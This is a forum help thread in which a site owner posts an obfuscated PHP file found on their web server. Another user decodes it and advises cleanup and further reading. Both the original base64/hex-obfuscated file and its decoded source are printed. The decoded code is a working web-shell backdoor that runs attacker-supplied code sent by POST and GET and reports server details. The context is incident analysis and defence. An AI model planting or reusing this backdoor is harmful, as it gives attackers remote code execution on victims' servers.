0

I found a file called 4be7.php in the root of my web site.

I guess my first worry is how did it get there? Well, I've changed my FTP log on, what else can I do?

Secondly, what is it? Here's what's in it:

<?php //176e622a9e272282a4a56a9100f5b75d 
 $_= 
//ppZiAAS8dDJF9Q*(#_+@#TWyJ
'Ci8qKgogKiBAdmVyc2lvbiAyLjYKICoKICovCmlmIChpc3NldCgkX1BPU1RbImFjdGlvbiJdKSkKewogICAgICAgIHN3aXRjaCAoJF9QT1NUWyJhY3Rpb24iXSkKICAgICAgICB7CiAgICAgICAgICAgICAgICBjYXNlICJ0ZXN0IjoKICAgICAgICAgICAgICAgICAgICAgICAgdGVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGNhc2UgInJlZ3VsYXJfdGVzdCI6CiAgICAgICAgICAgICAgICAgICAgICAgIHJlZ3VsYXJfdGVzdCgpOwogICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICAgICAgICAgIGNhc2UgIm1haWwiOgogICAgICAgICAgICAgICAgICAgICAgICBzZW5kKCk7CiAgICAgICAgICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgZGVmYXVsdDoKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQogICAgICAgIHJldHVybjsKfQoKaWYgKGNvdW50KCRfR0VUKSA+IDApCnsKICAgICAgICBmb3JlYWNoICgkX0dFVCBhcyAkaWQgPT4gJGNvZGUpCiAgICAgICAgewogICAgICAgICAgICAgICAgaWYgKCRpZCA9PSAiaWQiKQogICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAgICAgICAkY29kZSgpOwogICAgICAgICAgICAgICAgfQogICAgICAgIH0KICAgICAgICByZXR1cm47Cn0KCmZ1bmN0aW9uIHRlc3QoKQp7CiAgICAgICAgJGVuY29kZWRfZGF0YSA9ICIiOwoKICAgICAgICAkZGF0YVsidmVyc2lvbiJdID0gcGhwdmVyc2lvbigpOwogICAgICAgIGlmIChpc3NldCgkX1NFUlZFUlsiU0VSVkVSX1NPRlRXQVJFIl0pKQogICAgICAgIHsKICAgICAgICAgICAgICAgICRkYXRhWyJzZXJ2ZXJhcGkiXSA9ICRfU0VSVkVSWyJTRVJWRVJfU09GVFdBUkUiXTsKICAgICAgICB9CiAgICAgICAgZWxzZQogICAgICAgIHsKICAgICAgICAgICAgICAgICRkYXRhWyJzZXJ2ZXJhcGkiXSA9ICJOb3QgQXZhaWxhYmxlIjsKICAgICAgICB9CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBwaHBpbmZvKDgpOwogICAgICAgICRkYXRhWyJtb2R1bGVzIl0gPSBvYl9nZXRfY29udGVudHMoKTsKICAgICAgICBvYl9jbGVhbigpOwogICAgICAgICRkYXRhWyJleHRfY29ubmVjdCJdID0gZm9wZW4oImh0dHA6Ly93d3cueWEucnUvIiwgInIiKSA/IFRSVUUgOiBGQUxTRTsKICAgICAgICAkc2VyaWFsaXplc19kYXRhID0gc2VyaWFsaXplKCRkYXRhKTsKICAgICAgICAkZW5jb2RlZF9kYXRhID0gYmFzZTY0X2VuY29kZSgkc2VyaWFsaXplc19kYXRhKTsKICAgICAgICBlY2hvICRfUE9TVFsidGVzdF9tZXNzYWdlIl0gLiAkZW5jb2RlZF9kYXRhOwp9CgpmdW5jdGlvbiByZWd1bGFyX3Rlc3QoKQp7CgogICAgICAgICR0byA9ICJhaXJAZXhhbXBsZS5jb20iOwogICAgICAgICRzdWJqID0gIlNVQkohIjsKICAgICAgICAkbWVzc2FnZSA9ICJFSExPIjsKICAgICAgICAkcmVzID0gbWFpbCgkdG8sJHN1YmosJG1lc3NhZ2UpOwogICAgICAgIGlmKCRyZXMpCiAgICAgICAgewogICAgICAgICAgICBlY2hvICRfUE9TVFsidGVzdF9tZXNzYWdlIl07CiAgICAgICAgfQogICAgICAgIGVsc2UKICAgICAgICB7CiAgICAgICAgICAgIGVjaG8gc3RycmV2KCRfUE9TVFsidGVzdF9tZXNzYWdlIl0pOwogICAgICAgIH0KfQoKZnVuY3Rpb24gc2VuZCgpCnsKICAgICAgICAkY29kZSA9IGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJwcm9qZWN0Y29kZSJdKTsKCiAgICAgICAgZXZhbCgkY29kZSk7CiAgICAgICAgLy9yZXR1cm47Cn0K'; 
 //ppZiAAS8dDJF9Q*(#_+@#TWyJ
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));

I have searched on the internet but all pages I've found so far referring to any of this code result in the site trying to download some internet nasty or another on my PC so I'm guessing this is bad stuff!

Any advice welcome.

S.

3
Contributors
6
Replies
9
Views
5 Years
Discussion Span
Last Post by slyme
1

last string is hex code, while the rest is base64, this is the translation:

/**
 * @version 2.6
 *
 */
if (isset($_POST["action"]))
{
        switch ($_POST["action"])
        {
                case "test":
                        test();
                        break;
                case "regular_test":
                        regular_test();
                        break;
                case "mail":
                        send();
                        break;
                default:
                        break;
        }
        return;
}

if (count($_GET) > 0)
{
        foreach ($_GET as $id => $code)
        {
                if ($id == "id")
                {
                        $code();
                }
        }
        return;
}

function test()
{
        $encoded_data = "";

        $data["version"] = phpversion();
        if (isset($_SERVER["SERVER_SOFTWARE"]))
        {
                $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"];
        }
        else
        {
                $data["serverapi"] = "Not Available";
        }
        ob_start();
        phpinfo(8);
        $data["modules"] = ob_get_contents();
        ob_clean();
        $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE;
        $serializes_data = serialize($data);
        $encoded_data = base64_encode($serializes_data);
        echo $_POST["test_message"] . $encoded_data;
}

function regular_test()
{

        $to = "air@example.com";
        $subj = "SUBJ!";
        $message = "EHLO";
        $res = mail($to,$subj,$message);
        if($res)
        {
            echo $_POST["test_message"];
        }
        else
        {
            echo strrev($_POST["test_message"]);
        }
}

function send()
{
        $code = base64_decode($_POST["projectcode"]);

        eval($code);
        //return;
}

last string:

echo base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7');
# output:
# $code = base64_decode($_);
# eval($code);

You can start by removing it and sanitizing the data you get from any script in which you use POST or GET methods.

Edited by cereal: n/a

Votes + Comments
Useful post
0

Thanks cereal - Wow ... who'd have thought that it meant all that?!

So, I'm guessing that if a browser looked at this file then it will email air@example.com or contact http://www.ya.ru/ with some data depending on the GET/POST fields?

I don't understand how this file got there.

I do 'sanitise' any GET/POST fields that I use as follows:

function sanitise($input){
	if (get_magic_quotes_gpc()) {
		$input = stripslashes($input);
	}
	return htmlentities($input, ENT_QUOTES);
}

Is this good enough?

thanks for your help,

Simon.

0

mark this thread as solved if your problem solved

Hi Karthik_pranas,

Not sure if it is solved yet ... I'm still wondering if I'm doing enough to sanitise any inputs and, if I'm not, could this have been the route a malicious user might have used to upload this file?

I will keep my eye on this and I will mark as solved if/when it is. Thanks for the reminder.

Simon.

0

Hi, that is not sufficient, there are many ways to attack a PHP application you may want to read more about this subject here:

- https://www.owasp.org/index.php/Projects/OWASP_Secure_Web_Application_Framework_Manifesto/Releases/Current/Manifesto
- http://phpsec.org/projects/ & check also /library/

You must check server logs and application logs, review firewall rules, check if there are new processes. You can also try to search more info about this script by searching ppZiAAS8dDJF9Q*(#_+@#TWyJ , it seems this string is in common with other versions of the same script. Bye.

0

Hi, that is not sufficient, there are many ways to attack a PHP application you may want to read more about this subject here:

- https://www.owasp.org/index.php/Projects/OWASP_Secure_Web_Application_Framework_Manifesto/Releases/Current/Manifesto
- http://phpsec.org/projects/ & check also /library/

You must check server logs and application logs, review firewall rules, check if there are new processes. You can also try to search more info about this script by searching ppZiAAS8dDJF9Q*(#_+@#TWyJ , it seems this string is in common with other versions of the same script. Bye.

Thanks again cereal ... I shall mark this as resolved and start reading those pages ... there's an awful lot there!

thanks,

Simon.

This question has already been answered. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.